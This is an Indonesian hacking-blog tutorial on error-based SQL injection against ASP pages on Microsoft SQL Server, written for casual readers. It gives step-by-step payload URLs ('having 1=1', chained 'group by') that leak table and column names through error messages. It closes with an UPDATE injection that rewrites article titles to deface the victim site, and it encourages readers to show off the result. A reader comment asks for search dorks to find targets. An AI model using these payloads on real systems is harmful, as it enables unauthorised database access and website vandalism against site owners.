Sisi lain eksploitasi ASP injection part 3
halo semua nya
ketemu lagi dengan saya.
mudah-mudahan sampeyan semua ga bosen-bosen liat tutorial dari saya pak :D
saya cuma ingin membahas lagi tentang asp injection..
weks..
ada lagi ?!
iya pak, ada lagi.
mau baca ?!
hayuk lah kalo begitu... :P
mulai yah..
Begin.. :
contoh korban :
Kode:
http://victim.org/artikel.asp?id=1
untuk mengetahui apakah web tersebut terkena bugs...
kita akan menambahkan satu karakter ' [single quote] setelah kode artikel...
Kode:
http://victim.org/artikel.asp?id=1'
maka akan muncul error kurang lebih seperti begini
Kode:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string '1' order by creationdate DESC'.
/artikel.asp, line 140
ok..
muncul error kan.
itu tandanya lagi-lagi sebuah website dapat di explorer lebih jauh lagi..
kemudian kita menggunakan teknik "having 1=1" sama seperti yang sudah pernah kita bahas pada tutorial saya sebelumnya.. :)
[kalo lupa, silahkan di baca lagi pak.. :P]
kurang lebih implementasinya akan seperti ini
Kode:
http://victim.org/artikel.asp?id=1' having 1=1;-
maka akan muncul error
Kode:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'news.news_id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/artikel.asp, line 140
loh, apa itu artinya pak ?!
walah, saya juga ga tau apa itu artinya. tapi yang jelas itu bukan wangsit pak.. :lol:
ok, kurang begini penjelasananya :
news.news_id adalah nama tabel dan kolom database
news => nama tabel
news_id => nama kolom
seperti biasa, news.news_id belum di "clause" kan.
maka itu di masukan, untuk mengetahui tabel selanjutnya nama tabel dan kolom itu harus di masukan..
seperti yang sudah-sudah.. :D
Kode:
http://victim.org/artikel.asp?id=1' group by news.news_id having 1=1;-
loh... loh..
kq error lagi pak ?!
hla iya, namanya kita lagi coba hack kq. ya pasti try and error lah. orang itu intinya.. :P
ok sekarang kita liat error yang muncul
Kode:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'news.category' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/artikel.asp, line 140
sekarang kita dapat tabel dan kolom news.category
ok, langsung saja kita masukan lagi ke dalam address bar seperti tadi
Kode:
http://victim.org/artikel.asp?id=1' group by news.news_id,news.category having 1=1;-
akan muncul error lagi.
error nya kurang lebih seperti ini :
Kode:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'news.publish' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/artikel.asp, line 140
sekarang kita mendapat kolom baru lagi dengan nama "publish"
lanjut ke pencarian kolom berikutnya. maka tambaha kan nama tabel dan kolom seperti tadi.
Kode:
http://victim.org/artikel.asp?id=1' group by news.news_id,news.category,news.publish having 1=1;-
maka error yang muncul adalah
Kode:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'news.title' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/artikel.asp, line 140
kemudian lagi..lagi dan lagi muncul kolom baru dengan nama "title"
nah...
di situ ada kolom title kan.
saya ga akan mengajari anda untuk mengekasplor lebih jauh pak.
sekarang kita maen "deface" yuk..
hehehee..
sekali-kali iseng boleh donk.. :P
lah...
gimana caranya deface pak ?!
pertanyaan yang bagus.. :D
ok.
gini cara nya, kita akan memanfaat kan command "update"
ho ?!
gimana caranya?!
mudah pak..
liat, begini implementasinya
Kode:
http://victim.org/artikel.asp?id=1' update news set title='Hacked by nick anda';-
hanya segitu ?!
iya..
lha emang sampeyan kira seberapa ?!
aneh..
iks..
kemudian tekan "ENTER".
cukup sampai di sini.
udah, sekarang buka site tadi menggunakan jendela. dan lihat apa yang terjadi..
hehehehehee..
selamat..
nama anda sudah terpampang di situ.
beritahukan kepada teman-teman anda, biar anda semakin terkenal.
tapi maaf, mungkin anda tidak akan pernah berkembang lagi dalam belajar. :P
explor your brain..
ok.. :)
1 comment:
Dork nya apa ya sobat?? makasi~_^
Post a Comment